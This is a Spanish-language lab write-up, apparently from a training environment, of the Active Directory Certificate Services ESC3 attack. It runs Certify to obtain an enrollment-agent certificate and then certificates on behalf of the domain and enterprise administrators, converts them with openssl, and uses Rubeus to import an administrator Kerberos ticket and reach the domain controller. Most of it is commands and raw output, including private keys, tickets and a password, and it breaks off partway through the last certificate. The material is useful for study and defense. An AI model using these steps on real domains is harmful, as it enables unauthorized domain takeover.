AD CS - ESC3

Escalacion de Domain Admin

Solicitamos un certificado.

C:\AD\Tools>Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Agent

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student723
[*] No subject name specified, using current context as subject.

[*] Template                : SmartCardEnrollment-Agent
[*] Subject                 : CN=student723, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 26

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA4I+FDOA8/1N634WYW2BSqSpnjru2LW/C+THLJXUg3BQEhoBU
y70qhujvGDUtJO0NJ5n0yTar0bjme6rvFvAMeGQ5KynknMCr9P+VFASS3lhbWNpA
R+ZwMcyvXSivmBiK50WLrwbfw1vGKeXq103qJiMpNJQqeCsbD6WcohcsMkaGGCJe
na7fFKWjOHprQBS/xv0PyLIS4LEe2pCwe6nfu9C9V6DFTkGPEvPmC3OAWKXbAGEZ
RdqNDiskUlyuHA2UvMyEdl5q8JfiLG6qJ8n3OtH273LveZ1stxmPYmOzzBHdAITf
54OAKlqcQHRZ13i4QlJpavLfwXpXkBvoLpS/1QIDAQABAoIBAG/Q5wZfTeAxODi+
s/uj/eUAGWqoK3F6ehJNagMvzHnpectjcVW1zsw4hn1+VQlTBD7Y2Vur3mhiclnX
5o98XilAdnr4tD4dbkJjVV8PW/Zc9rdKjcF/jBQwAI4ZqT3J0riQF5rCiH8lXooU
Uxh8UoBE98qXkIIfrKzg4RqRAU/SgTj+YWM+GcC3cDhkqqLMPeUlJlR08zP2u5EK
YKDwkoarNnq6Tmu2a4r1RQdd9W7U0kF2vqaO9n0sV51gewAkDU8oIv6IUvSLLFOV
ukDhHs7jeh746SQ3uOCC9yf2NVff9EOef7yJwbPraGhADAlF2sH0evH1ZmKQBYT5
EuLUoW0CgYEA674X9ocQeeDdTsjE3Ez6d5Qpl9ccwZe7WjD5HPLcDaacKFDO5EO6
Iu+7Vw6t+LZO0shLQi5LWeLKis7nrxn+HAFkp2vyiXG6kAlH4EORP6Ij7z3iu5oW
OJ+vHTAwGedgIUc8rdYsFdFwyJAOYv/iEuOleCutRZfDqLeJpJebC1cCgYEA89tx
rj9eZbawAuoQ1Sg4jLxWaRi2BnY3oRCAOZFIXGSY1nf1onR7fQpKpBW/5hhjBrHo
Utt8nXk5CjbiC0O+pJU8tzs0slFfFUFsm9pzqmS8rR8jtTewdWnXshW61+vyyg9B
WCFpYM+AriN6bdp35uInIlIm0wO/1FQdYJfBfrMCgYAUVKyUYkmVeUMczEvOBAWF
0o1TvwWH3KIXwSl6yacYtkm5YF63aO/gm3Q4qddvH6nkm8mBx6RP+DMnjXiFrWQw
3h3kInckS16flW1RdgJMzpryww+OxlcsQvlDNyiu0zmDJTWieFoM96cWZPYYq6C/
qEpY9stWuSPypQGF5F1GuQKBgQCec4CykEpuHP7RZfX6C2BzUg1zzLK6ECalaWtn
/JbgMh19fgUFwlpbLUzCwb8na8EsoH0tGaEnUZVWpcLLPwGpP69r//SFyYnW7eP8
gT2XAk32z70MC1uFb3jQJn55vr7LvI3hDhTC6xHaFQOATeyLAXgcPPUtN8p11RIh
qXn5MQKBgBJmd1QU4oytAiefNZMurrzTUbH7dGRM01bGd2fTkgHeEBvtU8+60P3F
d2h1T6HdMXz8KZoNN9UJwHHeMgKinMdiVIcC9aRHYOsKRreVnV4ZP/NKexWa08Jr
mQwxc1Cd/QVxrKy1OFpzjeKGqHhxw7240xofFglMR39IFWo99lsZ
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGWDCCBUCgAwIBAgITFQAAABqkSkxB1toZ7AAAAAAAGjANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDQx
NDEzNTBaFw0yNjAzMDQxNDIzNTBaMHMxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh
cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRMwEQYDVQQDEwpzdHVkZW50NzIzMIIBIjAN
BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4I+FDOA8/1N634WYW2BSqSpnjru2
LW/C+THLJXUg3BQEhoBUy70qhujvGDUtJO0NJ5n0yTar0bjme6rvFvAMeGQ5Kynk
nMCr9P+VFASS3lhbWNpAR+ZwMcyvXSivmBiK50WLrwbfw1vGKeXq103qJiMpNJQq
eCsbD6WcohcsMkaGGCJena7fFKWjOHprQBS/xv0PyLIS4LEe2pCwe6nfu9C9V6DF
TkGPEvPmC3OAWKXbAGEZRdqNDiskUlyuHA2UvMyEdl5q8JfiLG6qJ8n3OtH273Lv
eZ1stxmPYmOzzBHdAITf54OAKlqcQHRZ13i4QlJpavLfwXpXkBvoLpS/1QIDAQAB
o4IDBDCCAwAwPAYJKwYBBAGCNxUHBC8wLQYlKwYBBAGCNxUIheGocofMn2jhhyaC
n65RgvL2fYE/guHdfLntDQIBZAIBBTAVBgNVHSUEDjAMBgorBgEEAYI3FAIBMA4G
A1UdDwEB/wQEAwIHgDAdBgkrBgEEAYI3FQoEEDAOMAwGCisGAQQBgjcUAgEwHQYD
VR0OBBYEFLIybQhTIdy7OWfq9O6ilUvG/WwgMB8GA1UdIwQYMBaAFNH+jQqn+rQy
nzb8ILj3y55oxUXtMIHYBgNVHR8EgdAwgc0wgcqggceggcSGgcFsZGFwOi8vL0NO
PW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1tY29ycC1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1tb25leWNvcnAsREM9bG9jYWw/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlz
dD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHLBggrBgEF
BQcBAQSBvjCBuzCBuAYIKwYBBQUHMAKGgatsZGFwOi8vL0NOPW1vbmV5Y29ycC1N
Q09SUC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049
U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tb25leWNvcnAsREM9bG9jYWw/
Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRo
b3JpdHkwQAYDVR0RBDkwN6A1BgorBgEEAYI3FAIDoCcMJXN0dWRlbnQ3MjNAZG9s
bGFyY29ycC5tb25leWNvcnAubG9jYWwwTwYJKwYBBAGCNxkCBEIwQKA+BgorBgEE
AYI3GQIBoDAELlMtMS01LTIxLTcxOTgxNTgxOS0zNzI2MzY4OTQ4LTM5MTc2ODg2
NDgtMTM2MDMwDQYJKoZIhvcNAQELBQADggEBAGRWjvCZo4ipjK9mKrEjS9Vz4+bW
7ZfWY7AjLcO2She2yuN1qtxTUFF5RlF9QeMOskAaSrYmrxI7qPhbi4O/pRyu7Yjj
8VrB6TziF2Yrb7+jtacDawRKk5cZv5YagG62oVOOzWkc/o4AIrZiqPKrdwrYWFuD
TDIs2oR3cFMSqwr2Q9XQckQQBZw1Qnnv1vRfxV2QghGJPCj7S6vwmMWx4S/0LdGI
qj+yNgp1NhraP2Qj6UzEJzMFTtAocLpUbSurjWz4/Bvl8E6+BUDo2zqjqHMDV1wt
ueKsLOYrdF5kIoWuRC8ONUZnqpPAP9CQsJOq2v1s5+Tblar1oXzqLqHX1mU=
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:11.6275190

Guardamos el output en un archivo cert.pem y luego, convertimos cert.pem en pfx.

PS C:\AD\Tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3agent.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

Nos pidio una password, seteamos SecretPass@123. Luego realizamos una siguiente consulta.

PS C:\AD\Tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:dcorp\administrator /enrollcert:esc3agent.pfx /enrollcertpw:SecretPass@123

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student723

[*] Template                : SmartCardEnrollment-Users
[*] On Behalf Of            : dcorp\administrator

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 27

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAsh7G2kKtVYbKmHfuRw6gO/JMWE1JfXeUOPYWXloNGn4SvjEQ
+MxdZOUvvS5ieRoWnux49AXWBlqicyMGTKIEIM1pGbW79SFv7cna12xIHskcmB4X
WzglCfSri/X55G4hgWghwxFfLZB1zL++uAdr9K4dZsMQh96Es1tGJH6cXLUw7gdG
Zy/3+DyOBQSfCCnfHE7a/LjF8lBrd4C9Gs6K55Uo7LkxL0AeczHJqdoO7H8TQG7h
jF/hqL0b/qdKiM4Eny4JGpdyp7nQqBCb2PoNN7JwZWcs1/ZZEj96SjsdkKCNRoHq
TOkZJXH4SayEBR6GJ/3691BNNg1fRV9IrgQf/QIDAQABAoIBABgoBF/lWwyWUzOK
UE5itWhr29693JGffgKbnTz+iXhmULRqgxq63I+qZWcKu2AhIaA8ActWX0hNUmq6
/Ue3UUgBk5dhBjSgbEWbcop0rPM/4xjeO9yrKJrJC9rXaSSJqxGZxbpmyLmtNcym
1H6wwvtUAbjGC5/hla2dW03nvdz0m6VPI0TC4Wax2uxP3eRhSoAxk27ww/VoZwNA
2kxULuB5s2yKz1HCkqcXiTfbA8mEbASBUOxGsRgUa4Gg6rJDpA6hJM+YCD6IGgjV
oBpaCFXg2cwfC0SpYuZmfholasp/6SP5GeborIzBcWI65WD/Pg3HqsFrnv7Q71Vp
gLTCKSECgYEAxDBOtz9TRtK+EzWTx6UaRdhFITGFDB5enJvtTJ3byg6YKlHwi6RE
S5sRJolnUIlHKPCCNdVstbeLGoWgIsKlcrIX0BOgTxk8CpoPOzuM5FSRKLiCxHPR
Spsw3+QjOoiPEx51HtvYQ/WB1aXfK9+Zhq7UpLkaHTA6Bcne4K6LaZ8CgYEA6GxN
Klk51fgBxjYhDS8CRDJojjqbGjKF170p+ebBlLPfnlahIhH1A6VfEqtFedJGu71z
xdJhnrptHwXrYUnHJkDPnT1vp6FgQ2C8rzCa776wYczlk9Wb96jJzq+6MWC0DQ3y
lnGuzahG0/W1nzwyw6Yo3FFiL7jdxZkzusUXiOMCgYAg+JViCoxuTKCRDeIGHWMq
9cu4ZmAbx0bTPwlEZQs5C/bateadMUAhDLB3L4Rjbo68/J6FeZbJe00vaeGdteSk
P/XsjD/Wy0Dh7z48ECf/f47drxSa+3Pi++3c0rRw895HskiwpPXVhf8J7tRwxSVC
E0O9YzZWTXKS4nhIfk0DtQKBgQCqCooOAIditnY92F4n8gt7b1G1NMVCzlHDe56Z
OSzJKSviAMkUTwTtbPB4jRtgO+oJ8logEYHgCc5J0x/Y5owvvVznUgo9HsB5qu2A
UlQYMG+Erc4McUwRTciPUVssQu6XWmvviy5zQbjH28zLudP99bORNG1cMqj1ptcE
vqswNwKBgQC7jXXlxJAp7JsccotkjZ/DubvIM6Kw4+49SfYBVmmymV5L+unC4TzH
OnEqFZfU9gXhF9Zd4d6o0NmWN+3OCYk9kJ55WA1bQEkQkU0N2eZqeXxLViz4i2u/
vH1UVu6LzLK/p9wWrtKrCdOVZJXmLtjj5dQhDyFpT4B1J4DJR0oFJQ==
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGiTCCBXGgAwIBAgITFQAAABulaPWVel6L8gAAAAAAGzANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDQx
NDMwMzlaFw0yNjAzMDQxNDQwMzlaMHYxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEaMBgGCgmSJomT8ixkARkWCmRvbGxh
cmNvcnAxDjAMBgNVBAMTBVVzZXJzMRYwFAYDVQQDEw1BZG1pbmlzdHJhdG9yMIIB
IjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsh7G2kKtVYbKmHfuRw6gO/JM
WE1JfXeUOPYWXloNGn4SvjEQ+MxdZOUvvS5ieRoWnux49AXWBlqicyMGTKIEIM1p
GbW79SFv7cna12xIHskcmB4XWzglCfSri/X55G4hgWghwxFfLZB1zL++uAdr9K4d
ZsMQh96Es1tGJH6cXLUw7gdGZy/3+DyOBQSfCCnfHE7a/LjF8lBrd4C9Gs6K55Uo
7LkxL0AeczHJqdoO7H8TQG7hjF/hqL0b/qdKiM4Eny4JGpdyp7nQqBCb2PoNN7Jw
ZWcs1/ZZEj96SjsdkKCNRoHqTOkZJXH4SayEBR6GJ/3691BNNg1fRV9IrgQf/QID
AQABo4IDMjCCAy4wPQYJKwYBBAGCNxUHBDAwLgYmKwYBBAGCNxUIheGocofMn2jh
hyaCn65RgvL2fYE/hrSlX4e6+hgCAWQCAQkwKQYDVR0lBCIwIAYIKwYBBQUHAwQG
CisGAQQBgjcKAwQGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIHgDA1BgkrBgEEAYI3
FQoEKDAmMAoGCCsGAQUFBwMEMAwGCisGAQQBgjcKAwQwCgYIKwYBBQUHAwIwHQYD
VR0OBBYEFI5EV5KeZWsEuE61TLIlOGQnPdOoMB8GA1UdIwQYMBaAFNH+jQqn+rQy
nzb8ILj3y55oxUXtMIHYBgNVHR8EgdAwgc0wgcqggceggcSGgcFsZGFwOi8vL0NO
PW1vbmV5Y29ycC1NQ09SUC1EQy1DQSxDTj1tY29ycC1kYyxDTj1DRFAsQ049UHVi
bGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049Q29uZmlndXJhdGlv
bixEQz1tb25leWNvcnAsREM9bG9jYWw/Y2VydGlmaWNhdGVSZXZvY2F0aW9uTGlz
dD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50MIHLBggrBgEF
BQcBAQSBvjCBuzCBuAYIKwYBBQUHMAKGgatsZGFwOi8vL0NOPW1vbmV5Y29ycC1N
Q09SUC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049
U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1tb25leWNvcnAsREM9bG9jYWw/
Y0FDZXJ0aWZpY2F0ZT9iYXNlP29iamVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRo
b3JpdHkwQwYDVR0RBDwwOqA4BgorBgEEAYI3FAIDoCoMKGFkbWluaXN0cmF0b3JA
ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWwwTQYJKwYBBAGCNxkCBEAwPqA8Bgor
BgEEAYI3GQIBoC4ELFMtMS01LTIxLTcxOTgxNTgxOS0zNzI2MzY4OTQ4LTM5MTc2
ODg2NDgtNTAwMA0GCSqGSIb3DQEBCwUAA4IBAQBlDd98YeMYrHARcbV18wL3CBMK
Bg5XBYpfQwKQ887DYJkC4v/KqjSFqbaGZBA9oRnvb9JohkDAtQZqjyfIOYyAd5Kp
zp32AZcMssWn5crKgCAua+9iTUEgybsfqN+WBMACfUISzFDK6za81G1/zmTbOitx
Liw1xWx67PX4etRUfJrY8o881yw/eEPPMUaiClhVtbt6rh3PW4H3CiSX7ntN8CF6
JgbZhdYXQDsEjqVR9hkizP2GlcLQZTirLAxQucbuAQFBYvFS7yAFVo126wKxdV03
gY8E7gWKl7NvmVpLfoELZMu497VZI5HavPSEo/886tIJSWAGte+YSeORcSuF
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:06.6038748
PS C:\AD\Tools\openssl>

Luego volvemos a guardar esto como cert.pem y volvemos a exportar como .pfx.

PS C:\AD\Tools\openssl> .\openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3user-DA.pfx
WARNING: can't open config file: /usr/local/ssl/openssl.cnf
Enter Export Password:
Verifying - Enter Export Password:

Ahora ejecutamos rubeus para cargar el certificado como un ticket.

PS C:\AD\Tools\openssl> ..\Rubeus.exe asktgt /user:administrator /certificate:esc3user-DA.pfx /password:SecretPass@123 /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.1

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Administrator, CN=Users, DC=dollarcorp, DC=moneycorp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dollarcorp.moneycorp.local\administrator'
[*] Using domain controller: 172.16.2.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
      ZG9sbGFyY29ycC5tb25leWNvcnAubG9jYWw=
[+] Ticket successfully imported!

  ServiceName              :  krbtgt/dollarcorp.moneycorp.local
  ServiceRealm             :  DOLLARCORP.MONEYCORP.LOCAL
  UserName                 :  administrator
  UserRealm                :  DOLLARCORP.MONEYCORP.LOCAL
  StartTime                :  3/4/2024 6:48:14 AM
  EndTime                  :  3/4/2024 4:48:14 PM
  RenewTill                :  3/11/2024 7:48:14 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  Sl/gcL97Sj/f0krXskSMbw==
  ASREP (key)              :  58B85F272C982B60EB11A37B72D188F3

PS C:\AD\Tools\openssl>

Verificamos que tenemos acceso.

PS C:\AD\Tools\openssl> ls \\dcorp-dc\C$


    Directory: \\dcorp-dc\C$


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          5/8/2021   1:20 AM                PerfLogs
d-r---        11/14/2022  10:12 PM                Program Files
d-----          5/8/2021   2:40 AM                Program Files (x86)
d-r---          3/4/2024   6:11 AM                Users
d-----         1/10/2024  12:59 AM                Windows


PS C:\AD\Tools\openssl> Enter-PSSession -Computername dcorp-dc
[dcorp-dc]: PS C:\Users\Administrator\Documents> whoami
dcorp\administrator
[dcorp-dc]: PS C:\Users\Administrator\Documents> hostname
dcorp-dc
[dcorp-dc]: PS C:\Users\Administrator\Documents>

Escalacion a Enterprice Admin

Con el archivo esc3agent.pfx generado anteriormente, solicitamos un certificado de nuevo.

PS C:\AD\Tools\openssl> ..\Certify.exe request /ca:mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA /template:SmartCardEnrollment-Users /onbehalfof:mcorp\administrator /enrollcert:esc3agent.pfx /enrollcertpw:SecretPass@123

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.0.0

[*] Action: Request a Certificates

[*] Current user context    : dcorp\student723

[*] Template                : SmartCardEnrollment-Users
[*] On Behalf Of            : mcorp\administrator

[*] Certificate Authority   : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 30

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAxi4Jch9h1sz4IHPyrvhw6Kk188lfzepHfOFVGMLu9iWxWiqv
O2ULTu17OXhXTKNJ7/UQrUBZxWKVZPWv2E8HFCurruD0G4QPMTkDgPm8TZL437xg
ykE205K1LdvBxqC6DnfogfR7wB2sk3S7TO0LZNT/dt1QaDhGjilarHo7As8XXWfF
pjrJzt2H4pR/n0DUBzEsr9RLsQgBEItpYE61kOiHvI4HgBzz56+bTzjBJUz2/Pzy
H9lGzXym1oqtCZ+OKeDgUPMt0JgnOvjcI0QGK4CNyVHoaTaUZLLA3DqMNrHZgLmy
oFKhgnZ9RAC/OZFMTS4WNAxUCJGwh6iVdwMaDQIDAQABAoIBAF92c6Rei5Gd4HQ5
hhBUqobYY53QRe75yH/WR1iLJfK6C2lkoE5bCQx3BuGTH3JSQd5tzR+3nMahC1e7
pX3r63wC4Ut3Hv9WKL9MOGzbX6J6hpm3s2QZ7+AQjmfNsNUOPTGU/xICg83yPVw2
YbbXhKKIm5pVV1MssIfwUbY9lsltwUsg7zMHEYSaBkFix/fRIcGQ+UW4V7rzFj3d
qigfpeO1JnA2xRz3gceNi/gb9znBOPx0j14n7tYAck4y4UE1Ymf42LCZdveL7/m4
H7KyV37BhmJFl/EP54ERIUCiUL8naoDUJ7z+Ow+zgRZUU7vxkC9LSrgvC9K1+A6g
vyxzF10CgYEA3aA5bgLf7xzJ31d1CqDUKOAkHIP2dWzC09a2AKbkafcDRGij95RO
EqI/U80FjrfybCl+e3diVPqs9aFdJ653SceToyk9sAhlUB8mBFBG2xOm8ZOl2pTq
1SBbCFj/TL5rf2MK2iQrwNvzOoHTNDD0Y5AwjSOCcZOpcl3Z5rWO3pMCgYEA5Orf
6EQw5p5setYoPpm3G0f8GZjEtgF+BVANvEy0X3lWMu2Q7lv0IK9TftcxeaDeMIId
EKmfLsG2+x44F3ehtsUP1q7x9x7F/ntTOZDqKKS1AQiDE46jkL6d0HP1CQM5mVdw
i8dVLDJNkkM9q/zBPMZ3WApekKkyd+mPQQD+6N8CgYAsr4ek1NOOBMH3VEz3DaJ5
c2gUj877sig+SkZ8LypS60kvW+Hjo3VycGBQZ0A9nH02rc8g2dtrwvdot1ZvD9Bh
geoUtdYITkkPNJiXug/vUDES+HAyeGA5BMMWFcu0D5jhIHkprq1bv311SIPrPAuq
n4IKkyRT/i/mLWIoEGd0HQKBgG/rzfFXdbkrd8pO7no82WODPGSfZn2+GQkr7KtF
rWKIhnZ75EJFvwRD9EStncjjt/5rfx5ocCWCHJ6GVdJTcUNU8bt66V5zM0aKsVQR
4ApjDQQmTz++m4XnTG1gZEs1wnGQaLxOhvwG1BpQudRezXOTbUIkP7vmnYA3Nw0H
GZptAoGANjvHmK7AYApsr9LJaGiN3G4BH4g66MFU6Yr7FMIHT5Y8EqWBcjsMCn0B
3kvOw+TUPWYIbtWPCanRb+YhgWMWRm0q0tWDgwtruT4ALQd6QDrlGAu4ypFV4Mj0
JaDILhOhbFzBTjXO76/5YxsbAje4SrGYukHh9XN5aRkN7YZzI2U=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGYTCCBUmgAwIBAgITFQAAAB72ASdAO29fkgAAAAAAHjANBgkqhkiG9w0BAQsF
ADBSMRUwEwYKCZImiZPyLGQBGRYFbG9jYWwxGTAXBgoJkiaJk/IsZAEZFgltb25l
eWNvcnAxHjAcBgNVBAMTFW1vbmV5Y29ycC1NQ09SUC1EQy1DQTAeFw0yNDAzMDQx
NTE2NDNaFw0yNjAzMDQxNTI2NDNaMFoxFTATBgoJkiaJk/IsZAEZFgVsb2NhbDEZ
MBcGCgmSJomT8ixkARkWCW1vbmV5Y29ycDEOMAwGA1UEAxMFVXNlcnMxFjAUBgNV
BAMTDUFkbWluaXN0cmF0b3IwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
AQDGLglyH2HWzPggc/Ku+HDoqTXzyV/N6kd84VUYwu72JbFaKq87ZQtO7Xs5eFdM
o0nv9RCtQFnFYpVk9a/YTwcUK6uu4PQbhA8xOQOA+bxNkvjfvGDKQTbTkrUt28HG
oLoOd+iB9HvAHayTdLtM7Qtk1P923VBoOEaOKVqsejsCzxddZ8WmOsnO3YfilH+f
